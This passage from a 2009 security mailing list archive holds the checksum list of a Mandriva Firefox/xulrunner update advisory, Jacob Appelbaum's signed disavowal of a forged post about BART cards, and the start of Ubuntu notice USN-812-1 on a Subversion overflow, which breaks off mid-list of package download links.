2009.1/x86_64/lib64ggadget1.0_0-0.10.5-8.4mdv2009.1.x86_64.rpm 62883fed1843c556659b681ccaedbaf7 2009.1/x86_64/lib64ggadget-gtk1.0_0-0.10.5-8.4mdv2009.1.x86_64.rpm c04399358f39bea011b70516b53c77f3 2009.1/x86_64/lib64ggadget-qt1.0_0-0.10.5-8.4mdv2009.1.x86_64.rpm 681cf0d9f283b53c2d9d2063695d3863 2009.1/x86_64/lib64google-gadgets-devel-0.10.5-8.4mdv2009.1.x86_64.rpm 014d1c2c8f128d9bff62c0dc1950fa6e 2009.1/x86_64/lib64opensc2-0.11.7-1.5mdv2009.1.x86_64.rpm 5833b0c82ae72fa9dd86fae661496fdc 2009.1/x86_64/lib64opensc-devel-0.11.7-1.5mdv2009.1.x86_64.rpm 5860961f66479a8a3d53d25b2f60e92c 2009.1/x86_64/lib64xulrunner1.9-1.9.0.13-0.1mdv2009.1.x86_64.rpm e1e06188cc7a6784d9a2542c21389e44 2009.1/x86_64/lib64xulrunner-devel-1.9.0.13-0.1mdv2009.1.x86_64.rpm c245b2dfa3c671353719224d8ca4529f 2009.1/x86_64/lib64xulrunner-unstable-devel-1.9.0.13-0.1mdv2009.1.x86_64.rpm 06c9d38b4830a69f5396d3bb75132e46 2009.1/x86_64/mozilla-plugin-opensc-0.11.7-1.5mdv2009.1.x86_64.rpm 35b409ded01fb0eb7d025351b9d2bf32 2009.1/x86_64/mozilla-thunderbird-beagle-0.3.9-9.5mdv2009.1.x86_64.rpm ce9a6dd2cb27352e5567f0b07706ec0d 2009.1/x86_64/opensc-0.11.7-1.5mdv2009.1.x86_64.rpm c0a59d0e57cf7d0446b89a7f60053b62 2009.1/x86_64/python-xpcom-1.9.0.13-0.1mdv2009.1.x86_64.rpm e2a2058629df60177dd44c31f01a7610 2009.1/x86_64/xulrunner-1.9.0.13-0.1mdv2009.1.x86_64.rpm 90bc8f01bbb02ea3684fae73d0724cee 2009.1/x86_64/yelp-2.26.0-3.3mdv2009.1.x86_64.rpm 4b81a86a1e6899c89ae1486fcbb86628 2009.1/SRPMS/beagle-0.3.9-9.5mdv2009.1.src.rpm e7b0518fbe0ac96dd8b2442811e87fb8 2009.1/SRPMS/epiphany-2.26.1-1.4mdv2009.1.src.rpm ab72543a864d87dcdadfaf0735df2ad8 2009.1/SRPMS/firefox-3.0.13-0.1mdv2009.1.src.rpm 803dc5963a371c3cd93d5b041e61517e 2009.1/SRPMS/firefox-ext-blogrovr-1.1.798-2.4mdv2009.1.src.rpm cb312b7248767df895bb1a9799a8b4e5 2009.1/SRPMS/firefox-ext-foxmarks-2.7.2-2.4mdv2009.1.src.rpm 2f5ee33b4f773bf28e6cff4615e8ee99 2009.1/SRPMS/firefox-ext-mozvoikko-0.9.6-2.4mdv2009.1.src.rpm 5bf3c44ddae5c7f7e316c1b79848e467 2009.1/SRPMS/firefox-ext-r-kiosk-0.7.2-2.4mdv2009.1.src.rpm 536db2daa3eefb15ecf3e587b5b28d91 2009.1/SRPMS/firefox-ext-scribefire-3.2.3-2.4mdv2009.1.src.rpm 820ce9b52392e98afefbb32f71c3cb44 2009.1/SRPMS/firefox-l10n-3.0.13-0.1mdv2009.1.src.rpm 59a1a2a272519d64250b6a6b8117288d 2009.1/SRPMS/firefox-theme-kde4ff-0.14-9.4mdv2009.1.src.rpm 349873828757e34b2b879ca615ceb710 2009.1/SRPMS/gnome-python-extras-2.25.3-3.4mdv2009.1.src.rpm e6a69f74f8562a5ed2fadd657f1dbb5f 2009.1/SRPMS/google-gadgets-0.10.5-8.4mdv2009.1.src.rpm 9e70f8d84d73da9179272d73f0ac1c8b 2009.1/SRPMS/opensc-0.11.7-1.5mdv2009.1.src.rpm a63e73d97a4c3ea86a0d976f9ba58d3c 2009.1/SRPMS/xulrunner-1.9.0.13-0.1mdv2009.1.src.rpm dae5e8bda38497ac3ae4f0ced05d7dd6 2009.1/SRPMS/yelp-2.26.0-3.3mdv2009.1.src.rpm Mandriva Enterprise Server 5: 68ce74618320a30cfdfe2d4063d5418e mes5/i586/firefox-3.0.13-0.1mdvmes5.i586.rpm 6d43b355dba55dd1af55e9cc713f0605 mes5/i586/firefox-af-3.0.13-0.1mdvmes5.i586.rpm 7d1f2c0b1f9151e2075c0c36d907fa00 mes5/i586/firefox-ar-3.0.13-0.1mdvmes5.i586.rpm 3988712bafbab7d137996404484cde30 mes5/i586/firefox-be-3.0.13-0.1mdvmes5.i586.rpm 593ee45262bec9390b221c02d8ee8864 mes5/i586/firefox-bg-3.0.13-0.1mdvmes5.i586.rpm 3567bb9057794aaf470d5d766a75bae0 mes5/i586/firefox-bn-3.0.13-0.1mdvmes5.i586.rpm 4f694f127521b4cddc19f0f50a3be63d mes5/i586/firefox-ca-3.0.13-0.1mdvmes5.i586.rpm cd04a5a66a2670f908fcb511d9a9821c mes5/i586/firefox-cs-3.0.13-0.1mdvmes5.i586.rpm 44eb4f6361c6645057f941e6e1ca43b4 mes5/i586/firefox-cy-3.0.13-0.1mdvmes5.i586.rpm f748608e0c7e1b5b382889af5a540012 mes5/i586/firefox-da-3.0.13-0.1mdvmes5.i586.rpm c1afbf2462632580e10beedf00ef4e23 mes5/i586/firefox-de-3.0.13-0.1mdvmes5.i586.rpm f55d0c036d9c84a9324ee618946810c0 mes5/i586/firefox-el-3.0.13-0.1mdvmes5.i586.rpm f51244caf9b6b71e6fc3c23cae421abf mes5/i586/firefox-en_GB-3.0.13-0.1mdvmes5.i586.rpm 2a4eccef20f00eceacce64a64327e5c6 mes5/i586/firefox-eo-3.0.13-0.1mdvmes5.i586.rpm 76e3121e28b5b223aaeb314a1bb30d03 mes5/i586/firefox-es_AR-3.0.13-0.1mdvmes5.i586.rpm f6f773cb3c0dfdea56f7cb1d1b02690d mes5/i586/firefox-es_ES-3.0.13-0.1mdvmes5.i586.rpm b41e4d171aba9ee620fe9987fee705f3 mes5/i586/firefox-et-3.0.13-0.1mdvmes5.i586.rpm f608df3e51d71887c42ee383a4a42de6 mes5/i586/firefox-eu-3.0.13-0.1mdvmes5.i586.rpm b246f92f226918d0bdb94cea1eb36040 mes5/i586/firefox-fi-3.0.13-0.1mdvmes5.i586.rpm 0731bc1f06c6d11892dfd0d6390fe2c8 mes5/i586/firefox-fr-3.0.13-0.1mdvmes5.i586.rpm aa6c29bb715d24c7408f9b87cdbb6a8c mes5/i586/firefox-fy-3.0.13-0.1mdvmes5.i586.rpm 748f49cefa5cbad391825aca290d3c66 mes5/i586/firefox-ga_IE-3.0.13-0.1mdvmes5.i586.rpm 372e5844c83e30bd4f7166c43963cc07 mes5/i586/firefox-gl-3.0.13-0.1mdvmes5.i586.rpm a5dd5f6079e40de2c1f802e249d5e591 mes5/i586/firefox-gu_IN-3.0.13-0.1mdvmes5.i586.rpm a35f66c748bc656e3e372eda1b167030 mes5/i586/firefox-he-3.0.13-0.1mdvmes5.i586.rpm 448a23e0530358423527c5b802c6c8ae mes5/i586/firefox-hi-3.0.13-0.1mdvmes5.i586.rpm d387c02975f83f8dfe12eb4c52b0a331 mes5/i586/firefox-hu-3.0.13-0.1mdvmes5.i586.rpm 1cd59afe967658f2b423539334c3ce61 mes5/i586/firefox-id-3.0.13-0.1mdvmes5.i586.rpm 444267bd6f7274c59dd179f59e618753 mes5/i586/firefox-is-3.0.13-0.1mdvmes5.i586.rpm e5879fdc064e5e35eb89514ed3188eb7 mes5/i586/firefox-it-3.0.13-0.1mdvmes5.i586.rpm 022dfc09d80f3faf5557449828e1b15f mes5/i586/firefox-ja-3.0.13-0.1mdvmes5.i586.rpm 49f516c1985e8e177025ab0682bfc2ef mes5/i586/firefox-ka-3.0.13-0.1mdvmes5.i586.rpm c98f30efb698ee50e0754338feced95e mes5/i586/firefox-kn-3.0.13-0.1mdvmes5.i586.rpm 3a3f75d10a4a6149eefa8835e32a548c mes5/i586/firefox-ko-3.0.13-0.1mdvmes5.i586.rpm 53f1afe28e0cdf504819ca0d58bc1b76 mes5/i586/firefox-ku-3.0.13-0.1mdvmes5.i586.rpm b15b9c778a7476304cd9659a3435529e mes5/i586/firefox-lt-3.0.13-0.1mdvmes5.i586.rpm c2a743444a51e06b3aa079c7edc01564 mes5/i586/firefox-lv-3.0.13-0.1mdvmes5.i586.rpm 75bf88f7f10a7a5b893bc3e71da9ca40 mes5/i586/firefox-mk-3.0.13-0.1mdvmes5.i586.rpm b746223c11dde362ae707dc984a7d5b0 mes5/i586/firefox-mn-3.0.13-0.1mdvmes5.i586.rpm 71fb9f66d6eb6bf426c4bdddaa039aa7 mes5/i586/firefox-mr-3.0.13-0.1mdvmes5.i586.rpm dd91665a870035058d8cac9f68b9d0c1 mes5/i586/firefox-nb_NO-3.0.13-0.1mdvmes5.i586.rpm 5ae1128299337783f6f3f29a28cf92a3 mes5/i586/firefox-nl-3.0.13-0.1mdvmes5.i586.rpm 74c75652327d9b02ca55cae7e45552b9 mes5/i586/firefox-nn_NO-3.0.13-0.1mdvmes5.i586.rpm 91abc0e9b5150d18fde15c3dbfda86f4 mes5/i586/firefox-oc-3.0.13-0.1mdvmes5.i586.rpm 1537934527c0ea2bfba002c439406ae8 mes5/i586/firefox-pa_IN-3.0.13-0.1mdvmes5.i586.rpm 2d869ba32910994884254f480b03024f mes5/i586/firefox-pl-3.0.13-0.1mdvmes5.i586.rpm 1ba3ede9924e9dc6a6638392d91f99cc mes5/i586/firefox-pt_BR-3.0.13-0.1mdvmes5.i586.rpm 26afeb86b4504a69f94b94e682f10673 mes5/i586/firefox-pt_PT-3.0.13-0.1mdvmes5.i586.rpm 62d639de32fef65aef8570c51276cb94 mes5/i586/firefox-ro-3.0.13-0.1mdvmes5.i586.rpm 0d3b10dc73e079018344d44832438ea8 mes5/i586/firefox-ru-3.0.13-0.1mdvmes5.i586.rpm 32a5aaeaf848da9aa7faba6f9d9f0289 mes5/i586/firefox-si-3.0.13-0.1mdvmes5.i586.rpm ce70f29874f44b4117a33d57800df5aa mes5/i586/firefox-sk-3.0.13-0.1mdvmes5.i586.rpm e81efac5f94ee35764a11df872d0290c mes5/i586/firefox-sl-3.0.13-0.1mdvmes5.i586.rpm 969c7c1522c5373afb1eecf406d6c260 mes5/i586/firefox-sq-3.0.13-0.1mdvmes5.i586.rpm 4ed22d07ae67fc6485485af042cd8343 mes5/i586/firefox-sr-3.0.13-0.1mdvmes5.i586.rpm c6d4137d25e4fa72095344462a65bdd7 mes5/i586/firefox-sv_SE-3.0.13-0.1mdvmes5.i586.rpm 2341ba79e4cb97d9d60468dbf830d2fb mes5/i586/firefox-te-3.0.13-0.1mdvmes5.i586.rpm f34c9a0a4688eac1cc5751c6cc5cac0d mes5/i586/firefox-th-3.0.13-0.1mdvmes5.i586.rpm 65d9f18cb1102f84c24ae0582cd4fa52 mes5/i586/firefox-tr-3.0.13-0.1mdvmes5.i586.rpm 82d53b480119bd4a7f99c5f15c03021a mes5/i586/firefox-uk-3.0.13-0.1mdvmes5.i586.rpm 942142b433ac41efcfac98a6284b6df1 mes5/i586/firefox-zh_CN-3.0.13-0.1mdvmes5.i586.rpm c13f0e4ff2b0454c0f039fb4d9e1b906 mes5/i586/firefox-zh_TW-3.0.13-0.1mdvmes5.i586.rpm 28a317a81524e49dae66c679e071c7dc mes5/i586/libxulrunner1.9-1.9.0.13-0.1mdvmes5.i586.rpm f2fee170073833e92e05a1773fd7f79a mes5/i586/libxulrunner-devel-1.9.0.13-0.1mdvmes5.i586.rpm ee14bbfaa18e70c6e84ef4ef052f5518 mes5/i586/libxulrunner-unstable-devel-1.9.0.13-0.1mdvmes5.i586.rpm f2cefcf568fb77cd7e9e57dad40643dc mes5/i586/xulrunner-1.9.0.13-0.1mdvmes5.i586.rpm af4d5ee43a7579e733e45b133525e7fe mes5/i586/yelp-2.24.0-3.9mdvmes5.i586.rpm 54c88c47e7001adc96f31678d4ed6d2a mes5/SRPMS/firefox-3.0.13-0.1mdvmes5.src.rpm 421f32b00b863c91540ca210021a9159 mes5/SRPMS/firefox-l10n-3.0.13-0.1mdvmes5.src.rpm d0e69e53f56c4cebca4bb17ef55817f1 mes5/SRPMS/xulrunner-1.9.0.13-0.1mdvmes5.src.rpm f41846dc047367609060a2772bd0d23b mes5/SRPMS/yelp-2.24.0-3.9mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: e03c3478bf344987f76907e81c291569 mes5/x86_64/firefox-3.0.13-0.1mdvmes5.x86_64.rpm 989de385bb476f7522882541aab3e05f mes5/x86_64/firefox-af-3.0.13-0.1mdvmes5.x86_64.rpm 7b84837d2401a0c7cff4f7481d69578e mes5/x86_64/firefox-ar-3.0.13-0.1mdvmes5.x86_64.rpm 51d077dc8a98838525f9c8614caf7811 mes5/x86_64/firefox-be-3.0.13-0.1mdvmes5.x86_64.rpm 6286b0236105ae18397c4a91d33e439b mes5/x86_64/firefox-bg-3.0.13-0.1mdvmes5.x86_64.rpm 2de1a7bcc7261876eff13fae68b08189 mes5/x86_64/firefox-bn-3.0.13-0.1mdvmes5.x86_64.rpm 1e44ba305a7e68d52647450f8777e213 mes5/x86_64/firefox-ca-3.0.13-0.1mdvmes5.x86_64.rpm ea295a97b2fa4b68bb093627a86d64c9 mes5/x86_64/firefox-cs-3.0.13-0.1mdvmes5.x86_64.rpm 137181dc58e872687e07c05961b3e844 mes5/x86_64/firefox-cy-3.0.13-0.1mdvmes5.x86_64.rpm 0e566afa6fc6039453a07774cb2a8afd mes5/x86_64/firefox-da-3.0.13-0.1mdvmes5.x86_64.rpm 9e0adea3596af1f8f95dcfac4a882aed mes5/x86_64/firefox-de-3.0.13-0.1mdvmes5.x86_64.rpm 007ec7d357e3f92cfc2def7390c5de69 mes5/x86_64/firefox-el-3.0.13-0.1mdvmes5.x86_64.rpm b3cb3fec4847f3950df7c8eb63a30654 mes5/x86_64/firefox-en_GB-3.0.13-0.1mdvmes5.x86_64.rpm dcb54c4aaec8489e2e768ecbda74391d mes5/x86_64/firefox-eo-3.0.13-0.1mdvmes5.x86_64.rpm 35985b7b0d0dee31e04608a0290e9ef6 mes5/x86_64/firefox-es_AR-3.0.13-0.1mdvmes5.x86_64.rpm 6154a855d02f202ce2abec4f24857189 mes5/x86_64/firefox-es_ES-3.0.13-0.1mdvmes5.x86_64.rpm f11f06980dc4911bcecc05daecae10c3 mes5/x86_64/firefox-et-3.0.13-0.1mdvmes5.x86_64.rpm 763ce8174c14f409dddfbd1fdb8aa33a mes5/x86_64/firefox-eu-3.0.13-0.1mdvmes5.x86_64.rpm 8e06f6d02f31cd75a5f0adc2c07b5b79 mes5/x86_64/firefox-fi-3.0.13-0.1mdvmes5.x86_64.rpm 91a7e39c750b5f13621a6e28026a9a29 mes5/x86_64/firefox-fr-3.0.13-0.1mdvmes5.x86_64.rpm a42546e8023cc76b9fa20197b4c8d879 mes5/x86_64/firefox-fy-3.0.13-0.1mdvmes5.x86_64.rpm a5c71261c0569a7ac356cd524bcc8e2b mes5/x86_64/firefox-ga_IE-3.0.13-0.1mdvmes5.x86_64.rpm 9c7bdef8c25b9f8bde7fc23330d9ee56 mes5/x86_64/firefox-gl-3.0.13-0.1mdvmes5.x86_64.rpm 57fc2626a71cd7c30b29bf6f657d8b01 mes5/x86_64/firefox-gu_IN-3.0.13-0.1mdvmes5.x86_64.rpm fdcfc85e77649e447205447fe50c5dfd mes5/x86_64/firefox-he-3.0.13-0.1mdvmes5.x86_64.rpm 8362b8bb5dbdcbfb59c4611329d093cd mes5/x86_64/firefox-hi-3.0.13-0.1mdvmes5.x86_64.rpm dcf7d31040980c688857daae110b0f19 mes5/x86_64/firefox-hu-3.0.13-0.1mdvmes5.x86_64.rpm 0d2b895382a88cb60a1bd85f4998ed6a mes5/x86_64/firefox-id-3.0.13-0.1mdvmes5.x86_64.rpm c76cf1e3e063204dbd7b43cbb2057cba mes5/x86_64/firefox-is-3.0.13-0.1mdvmes5.x86_64.rpm 3bb2be5f72710786bb187716cb6574c1 mes5/x86_64/firefox-it-3.0.13-0.1mdvmes5.x86_64.rpm 70c2a50d16cccd9c3cf9fd8d94239594 mes5/x86_64/firefox-ja-3.0.13-0.1mdvmes5.x86_64.rpm bba8deee10fda2787de3ab64fa4d9a7f mes5/x86_64/firefox-ka-3.0.13-0.1mdvmes5.x86_64.rpm 68b364b3b98f289c7a23f53e221d47e8 mes5/x86_64/firefox-kn-3.0.13-0.1mdvmes5.x86_64.rpm a4f1ae70d33196720fdd44e596603655 mes5/x86_64/firefox-ko-3.0.13-0.1mdvmes5.x86_64.rpm 6346cf41df51d14326568731308532bf mes5/x86_64/firefox-ku-3.0.13-0.1mdvmes5.x86_64.rpm d29a7afa66350e378bf5d3de7f76203f mes5/x86_64/firefox-lt-3.0.13-0.1mdvmes5.x86_64.rpm f0c2b91ae52b0fd6309c13c6aa7dae39 mes5/x86_64/firefox-lv-3.0.13-0.1mdvmes5.x86_64.rpm bf856892d6521c21ee75e1319c78dd34 mes5/x86_64/firefox-mk-3.0.13-0.1mdvmes5.x86_64.rpm ef8ab221b17c2da7b78c6055bb560af4 mes5/x86_64/firefox-mn-3.0.13-0.1mdvmes5.x86_64.rpm 5ef379935bc2943e1ee5b18a6447bbbf mes5/x86_64/firefox-mr-3.0.13-0.1mdvmes5.x86_64.rpm a1aaa61a653132105b4b2f40a2625e4b mes5/x86_64/firefox-nb_NO-3.0.13-0.1mdvmes5.x86_64.rpm 339baf16b41ba0660fde271355a3de7d mes5/x86_64/firefox-nl-3.0.13-0.1mdvmes5.x86_64.rpm c650a19b817d2b8cc1662986ffb04e59 mes5/x86_64/firefox-nn_NO-3.0.13-0.1mdvmes5.x86_64.rpm dc4d96fd6075c6a90b66b477510e179d mes5/x86_64/firefox-oc-3.0.13-0.1mdvmes5.x86_64.rpm 1b3dfa583675569048d1edeefe5c57ea mes5/x86_64/firefox-pa_IN-3.0.13-0.1mdvmes5.x86_64.rpm 8afc2ee811699233cd4d14fb0bb1d296 mes5/x86_64/firefox-pl-3.0.13-0.1mdvmes5.x86_64.rpm d79b9366c1e992a712c5a4f91b5dc786 mes5/x86_64/firefox-pt_BR-3.0.13-0.1mdvmes5.x86_64.rpm fa1f52c44c980cbd5dca80493e6675ee mes5/x86_64/firefox-pt_PT-3.0.13-0.1mdvmes5.x86_64.rpm 2a17cc2687a58a08354a5b10d2d3b852 mes5/x86_64/firefox-ro-3.0.13-0.1mdvmes5.x86_64.rpm 8000f1cb87249be3a0349d04cd4a9eb7 mes5/x86_64/firefox-ru-3.0.13-0.1mdvmes5.x86_64.rpm dad9e02f89bbb0854b275a148c66241c mes5/x86_64/firefox-si-3.0.13-0.1mdvmes5.x86_64.rpm c7d158a23a34629f14020eb5efaaf347 mes5/x86_64/firefox-sk-3.0.13-0.1mdvmes5.x86_64.rpm c8292fb404bbc4fc723583f656074fce mes5/x86_64/firefox-sl-3.0.13-0.1mdvmes5.x86_64.rpm 41706d44a8c609ea2ca0911c8216f9c2 mes5/x86_64/firefox-sq-3.0.13-0.1mdvmes5.x86_64.rpm dd036fccfa39a75f5f2d08c3c8e7348a mes5/x86_64/firefox-sr-3.0.13-0.1mdvmes5.x86_64.rpm f03d90e5417feca4d2fc3f03303023e7 mes5/x86_64/firefox-sv_SE-3.0.13-0.1mdvmes5.x86_64.rpm ee392c1fa9a4d6a286daae882fac30dd mes5/x86_64/firefox-te-3.0.13-0.1mdvmes5.x86_64.rpm e7dbf99e35d5709d2ba79997be5a0d8f mes5/x86_64/firefox-th-3.0.13-0.1mdvmes5.x86_64.rpm 4104f247e2eee44420fe588c2dc73f06 mes5/x86_64/firefox-tr-3.0.13-0.1mdvmes5.x86_64.rpm 9376a1d0cb246a9bf3ddde32d6547c3a mes5/x86_64/firefox-uk-3.0.13-0.1mdvmes5.x86_64.rpm 5e17ce5c19b28d4bf91b9ec4583a435b mes5/x86_64/firefox-zh_CN-3.0.13-0.1mdvmes5.x86_64.rpm b75f0b6f95cd8df522663ff5d5247912 mes5/x86_64/firefox-zh_TW-3.0.13-0.1mdvmes5.x86_64.rpm c22b5e430870d9e46ddf2fc49a3f399a mes5/x86_64/lib64xulrunner1.9-1.9.0.13-0.1mdvmes5.x86_64.rpm 99039eb2e0e34653b4f8a702df3eba28 mes5/x86_64/lib64xulrunner-devel-1.9.0.13-0.1mdvmes5.x86_64.rpm 8f8dc6a09f009108d5e58aed35bc3c88 mes5/x86_64/lib64xulrunner-unstable-devel-1.9.0.13-0.1mdvmes5.x86_64.rpm 64c12a8b37ce470ddeca303330fc759d mes5/x86_64/xulrunner-1.9.0.13-0.1mdvmes5.x86_64.rpm 50e336826d9447ee0a11ac696740f78a mes5/x86_64/yelp-2.24.0-3.9mdvmes5.x86_64.rpm 54c88c47e7001adc96f31678d4ed6d2a mes5/SRPMS/firefox-3.0.13-0.1mdvmes5.src.rpm 421f32b00b863c91540ca210021a9159 mes5/SRPMS/firefox-l10n-3.0.13-0.1mdvmes5.src.rpm d0e69e53f56c4cebca4bb17ef55817f1 mes5/SRPMS/xulrunner-1.9.0.13-0.1mdvmes5.src.rpm f41846dc047367609060a2772bd0d23b mes5/SRPMS/yelp-2.24.0-3.9mdvmes5.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKfHuImqjQ0CJFipgRArnYAJwJ+vTi6q/JO7k6XU42/uknW/nuaQCdH6cE IPsXB9VGzG+N6kDjB1qX6x0= =dRCP -----END PGP SIGNATURE----- From jacob at appelbaum.net Fri Aug 7 22:59:32 2009 From: jacob at appelbaum.net (Jacob Appelbaum) Date: Fri, 07 Aug 2009 14:59:32 -0700 Subject: [Full-disclosure] BART Message-ID: <4A7CA3C4.6040205@appelbaum.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Hello, This is an email in response to the following FD post: http://seclists.org/fulldisclosure/2009/Aug/0035.html I did not write the above mentioned email regarding BART cards. That email is not from my email address and it's not a related Noisebridge email address either. Whoever is has control of that address is clearly hostile and anyone emailing it should assume the worst. The contents of that email appear to be partially taken from a free software project that I work on. The rest of the information is made up and likely false. I sign public email with the following PGP key: pub 1024D/9D0FACE4 2008-03-11 [expires: 2010-03-11] Key fingerprint = 12E4 04FF D3C9 31F9 3405 2D06 B884 1A91 9D0F ACE4 uid Jacob Appelbaum sub 4096g/D5E87583 2008-03-11 [expires: 2010-03-11] I've signed this email and the previously mentioned forgery lacks any such digital signature. Please disregard it. Best regards, Jacob -----BEGIN PGP SIGNATURE----- iD8DBQFKfKNeuIQakZ0PrOQRCMW/AJ98g2YmO6wp5Ht33//80PeGi4qq5ACeNwRE amuQfRBoYzXVUHUju8Ki8QM= =25gP -----END PGP SIGNATURE----- From jamie at canonical.com Sat Aug 8 01:56:30 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Fri, 7 Aug 2009 19:56:30 -0500 Subject: [Full-disclosure] [USN-812-1] Subversion vulnerability Message-ID: <20090808005629.GA2318@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-812-1 August 08, 2009 subversion vulnerability CVE-2009-2411 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libsvn0 1.3.1-3ubuntu1.2 Ubuntu 8.04 LTS: libsvn1 1.4.6dfsg1-2ubuntu1.1 Ubuntu 8.10: libsvn1 1.5.1dfsg1-1ubuntu2.1 Ubuntu 9.04: libsvn1 1.5.4dfsg1-1ubuntu2.1 After a standard system upgrade you need to restart any applications that use Subversion, such as Apache when using mod_dav_svn, to effect the necessary changes. Details follow: Matt Lewis discovered that Subversion did not properly sanitize its input when processing svndiff streams, leading to various integer and heap overflows. If a user or automated system processed crafted input, a remote attacker could cause a denial of service or potentially execute arbitrary code as the user processing the input. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.3.1-3ubuntu1.2.diff.gz Size/MD5: 51347 c0c40910513fad858e651d28eb777d90 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.3.1-3ubuntu1.2.dsc Size/MD5: 1232 3411237a38a8cc2099bd0ab3b783f76f http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.3.1.orig.tar.gz Size/MD5: 8778545 6d650e918255596ef8b74255b3938547 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-doc_1.3.1-3ubuntu1.2_all.deb Size/MD5: 988728 34da0125d08efbe8c72e6b7854dcda4c http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-ruby_1.3.1-3ubuntu1.2_all.deb Size/MD5: 962 68c7f2f0baa7cef0d7fa3c044e9c8939 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python2.4-subversion_1.3.1-3ubuntu1.2_all.deb Size/MD5: 59424 fd6a1892f19c2f46409d09ec49476916 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion-tools_1.3.1-3ubuntu1.2_all.deb Size/MD5: 122848 a4e29cb9c9024f6fde60be638635a350 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libapache2-svn_1.3.1-3ubuntu1.2_amd64.deb Size/MD5: 119524 c4a6aaa9e2ba024dcb034ab8cd961a13 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-core-perl_1.3.1-3ubuntu1.2_amd64.deb Size/MD5: 781350 ae53744ea4ee9b5bac254cd32705f0fd http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-javahl_1.3.1-3ubuntu1.2_amd64.deb Size/MD5: 196296 f490365e921916132488b5c8b81e5996 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-ruby1.8_1.3.1-3ubuntu1.2_amd64.deb Size/MD5: 324364 f7841b3cfe86963187f57acf945f8c1d http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn0-dev_1.3.1-3ubuntu1.2_amd64.deb Size/MD5: 850160 bf8939624c217b8ac249aba1860f5dea http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn0_1.3.1-3ubuntu1.2_amd64.deb Size/MD5: 595228 fe16fce38c13e242ef34895907fd0930 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion_1.3.1-3ubuntu1.2_amd64.deb Size/MD5: 526018 5c868400dd90c3aef430e638444f9ece http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.3.1-3ubuntu1.2_amd64.deb Size/MD5: 215166 b70e026e533cb972deeb108a34859708 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libapache2-svn_1.3.1-3ubuntu1.2_i386.deb Size/MD5: 112946 624c93fdd66cde1738ea19b6c10bdd2b http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-core-perl_1.3.1-3ubuntu1.2_i386.deb Size/MD5: 758834 87e306fd3e625b74f00fc5e8f3df4886 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-javahl_1.3.1-3ubuntu1.2_i386.deb Size/MD5: 189972 e05345113f79a8828098ef719da32c87 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-ruby1.8_1.3.1-3ubuntu1.2_i386.deb Size/MD5: 274486 42ae0de4fea5b8886b3f48f5178a9798 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn0-dev_1.3.1-3ubuntu1.2_i386.deb Size/MD5: 723220 3abd2eaa27d1bce968829878a3355668 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn0_1.3.1-3ubuntu1.2_i386.deb Size/MD5: 513550 31dbc179c1b5deddb69f7c009f5ee2fb http://security.ubuntu.com/ubuntu/pool/main/s/subversion/python-subversion_1.3.1-3ubuntu1.2_i386.deb Size/MD5: 445962 152995d4e6d3c74714007f614a256db2 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/subversion_1.3.1-3ubuntu1.2_i386.deb Size/MD5: 203146 3f2dfacf0739123774a812a43d721365 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libapache2-svn_1.3.1-3ubuntu1.2_powerpc.deb Size/MD5: 120084 033cf6710a6ec16430dfc826c5c632e0 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-core-perl_1.3.1-3ubuntu1.2_powerpc.deb Size/MD5: 753648 2c3fb10a01c982a784d8ee7bcefc3376 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-javahl_1.3.1-3ubuntu1.2_powerpc.deb Size/MD5: 194690 487d3c18d3fb7006764e36ccfd9e7950 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn-ruby1.8_1.3.1-3ubuntu1.2_powerpc.deb Size/MD5: 304620 54a2444dd5a5b858346fb8e27557dbfc http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn0-dev_1.3.1-3ubuntu1.2_powerpc.deb Size/MD5: 846752 baf6f1ce1673cb41f594a4d30d5dac56 http://security.ubuntu.com/ubuntu/pool/main/s/subversion/libsvn0_1.3.1-3ubuntu1.2_powerpc.deb 